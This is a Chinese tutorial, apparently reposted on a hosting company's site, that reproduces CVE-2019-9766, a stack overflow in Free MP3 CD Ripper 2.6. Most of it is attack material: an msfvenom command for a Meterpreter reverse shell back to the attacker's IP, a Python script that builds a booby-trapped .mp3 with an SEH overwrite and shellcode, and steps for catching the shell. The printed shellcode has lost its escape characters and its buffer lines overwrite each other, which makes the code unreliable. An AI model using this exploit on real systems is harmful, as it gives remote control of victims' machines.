如何实现Free MP3 CD Ripper缓冲区溢出远程代码执行漏洞CVE-2019-9766复现
如何实现Free MP3 CD Ripper缓冲区溢出远程代码执行漏洞CVE-2019-9766复现
如何实现Free MP3 CD Ripper缓冲区溢出远程代码执行漏洞CVE-2019-9766复现,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。
漏洞简介:
Free MP3 CD Ripper是一款音频格式转换器。
Free MP3 CD Ripper 2.6版本中存在栈缓冲区溢出漏洞。远程攻击者可借助特制的.mp3文件利用该漏洞执行任意代码。
威胁类型
远程代码执行
威胁等级
高
漏洞编号
CVE-2019-9766
受影响系统及应用版本
Free MP3 CD Ripper 2.6
漏洞复现:
攻击机:kali2020 、kali2019
ip:192.168.6.146
受害机:win10
ip:192.168.6.142
安装Free MP3 CD Ripper 2.6版本
1、搭建环境
Win10下载安装Free MP3 CD Ripper 2.6版本
利用msf生成反向连接的shellcode
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.6.146 lport=888 -f c --smallest
替换脚本中的shellcode.
编写生成.Mp3文件的脚本
#Stack-based buffer overflow in Free MP3 CD Ripper 2.6 buffer="A"*4116 NSEH="xebx06x90x90" SEH="x84x20xe4x66" nops="x90"*5 buf="" buf="xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30" buf="x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff" buf="xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52" buf="x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1" buf="x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8b" buf="x01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03" buf="x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8b" buf="x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24" buf="x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xeb" buf="x8dx5dx68x33x32x00x00x68x77x73x32x5fx54x68x4c" buf="x77x26x07x89xe8xffxd0xb8x90x01x00x00x29xc4x54" buf="x50x68x29x80x6bx00xffxd5x6ax0ax68xc0xa8x6ex84" buf="x68x02x00x03x78x89xe6x50x50x50x50x40x50x40x50" buf="x68xeax0fxdfxe0xffxd5x97x6ax10x56x57x68x99xa5" buf="x74x61xffxd5x85xc0x74x0cxffx4ex08x75xecx68xf0" buf="xb5xa2x56xffxd5x6ax00x6ax04x56x57x68x02xd9xc8" buf="x5fxffxd5x8bx36x6ax40x68x00x10x00x00x56x6ax00" buf="x68x58xa4x53xe5xffxd5x93x53x6ax00x56x53x57x68" buf="x02xd9xc8x5fxffxd5x01xc3x29xc6x75xeexc3"; pad="B"*(316-len(nops)-len(buf)) payload=buffer+NSEH+SEH+nops+buf+pad try: f=open("Test_Free_MP3.mp3","w") print ("[+]Creating %s bytes mp3 Files..."%len(payload)) f.write(payload) f.close() print ("[+]mp3 File created successfully!") except: print ("File cannot be created!")
运行脚本,生成一个.MP3的文件
将生成的.mp3文件放到win10上(需要VMtools)
kali开启msfconsole
使用exploit/multi/handler模块
设置lhost,lport,攻击载荷
Kali开启监听:
Win10使用free MP3 CD ripper 打开mp3文件
接收反弹的shell
执行命令
漏洞利用成功
PS: 说一个我踩的坑吧,真的头一次遇到这种情况:
漏洞利用攻击机需要用kali2019版本,2020版本不可以利用。用2020试了好多遍都没有成功,最后鬼使神差的用了2019就成功了。有遇到过这样情况的大佬分享一下经验吗。
2、修复建议
及时更新Free MP3 CD Ripper到最新版本
看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注高防服务器网行业资讯频道,感谢您对高防服务器网的支持。
[微信提示:高防服务器能助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。
[图文来源于网络,不代表本站立场,如有侵权,请联系高防服务器网删除]
[